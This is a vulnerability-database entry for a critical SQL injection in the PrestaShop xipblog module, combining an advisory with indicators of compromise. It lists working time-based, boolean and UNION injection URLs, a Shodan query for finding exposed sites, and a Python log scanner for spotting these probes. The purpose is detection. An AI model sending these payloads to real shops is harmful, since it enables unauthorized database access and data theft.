CVE-2023-27847
Published 2023-03-27
Priority P268 · critical · CVSS 3.1: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 4.71% (90.7th percentile)
SQL injection vulnerability found in PrestaShop xipblog v.2.0.1 and before allows a remote attacker to gain privileges via the xipcategoryclass and xippostsclass components.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xipblog_project | xipblog | <= 2.0.1 | — |
Detection & IOCs (extracted from sources)
- url: `/module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl`
- url: `/module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs`
- url: `/module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs`
- url: `/module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999)),NULL,NULL--+-`
- path: `/module/xipblog/archive`
- other: shodan: `html:"/xipblog"`

- Time-based blind SQLi: inject SLEEP(5) payload into the `subpage_type` parameter of /module/xipblog/archive and check for response duration >= 5 seconds with HTTP status != 404.
- Boolean-based blind SQLi confirmation: a true condition (5484=5484) returns a body containing `kr_blog_post_area`; a false condition (5484=5485) does not. Use this differential to confirm injection.
- Union-based SQLi: a 26-column UNION SELECT with CONCAT(md5(...)) in column 27 confirms data exfiltration when the md5 hash appears in the response body.
- Vulnerable endpoint is accessible by anonymous (unauthenticated) users; no authentication is required to exploit the injection in the `subpage_type` GET parameter.
- Presence of the string `xipblog` in page body (e.g. via Shodan `html:"/xipblog"`) can be used to fingerprint potentially vulnerable PrestaShop instances before probing.
- Vulnerable components are `xipcategoryclass` and `xippostsclass` within the xipblog PrestaShop module; monitor SQL query logs for anomalous queries originating from these class contexts.
- The patched version still carries the version number 2.0.1; version-based detection alone cannot distinguish vulnerable from patched installations, so behavioral/code-level checks are required.
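
Because the version number cannot separate patched from unpatched installs, reviewing request logs for probes against the endpoint is one behavioural check. The following is an added example, not taken from the sources indexed on this page: it flags requests to `/module/xipblog/archive` whose `subpage_type` value falls outside a plain-token allowlist and labels the probe style. The combined log format, the allowlist and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
ENDPOINT = "/module/xipblog/archive"   # vulnerable path named on the page
PARAM = "subpage_type"                 # injectable GET parameter named on the page
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]*")  # assumption: real values are plain tokens
TECHNIQUES = [  # checked in order; first match wins
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("union-based", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("boolean-based", re.compile(r"\b(and|or)\b\s+\S+\s*=\s*\S+", re.I)),
]
# Constructed access-log lines (documentation IP range), not captured traffic.
_PRE = '203.0.113.7 - - [01/Apr/2023:10:00:00 +0000] "GET '
_Q = "/module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type="
SAMPLE_LOG = [
    _PRE + _Q + 'post HTTP/1.1" 200 5120',
    _PRE + _Q + 'post%22+AND+5484=5484--+xhCs HTTP/1.1" 200 5120',
    _PRE + "/en" + _Q + 'post%22+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1" 200 812',
    _PRE + _Q + 'post%2522+UNION+ALL+SELECT+NULL,NULL--+- HTTP/1.1" 200 812',
    _PRE + '/search?subpage_type=post%22+AND+1=1 HTTP/1.1" 200 900',
]

def classify(value):
    """Return None for an allowlisted value, else a label for the probe style."""
    for _ in range(2):                 # undo up to two extra layers of URL encoding
        value = unquote_plus(value)
    if SAFE_VALUE.fullmatch(value):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "suspicious"                # off-allowlist but matches no known pattern

def scan(lines):
    """Yield (line_no, http_status, label) for flagged xipblog archive requests."""
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith(ENDPOINT):   # tolerate language/base-dir prefixes
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            label = classify(value)
            if label:
                yield no, int(m.group(2)), label

if __name__ == "__main__":
    print(list(scan(SAMPLE_LOG)))
```

A flagged request that returned a status other than 404 is worth correlating with database query logs and response times, since the log line alone does not show whether the injection succeeded.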
No detection rules found.
Nuclei
CVE-2023-27847 [CRITICAL] PrestaShop xipblog - SQL Injection
In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
Template:

```yaml
id: CVE-2023-27847
info:
  name: PrestaShop xipblog - SQL Injection
  author: mastercho
  severity: critical
  description: |
    In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized acces
```

No writeups or analysis indexed.
2023-03-27
Published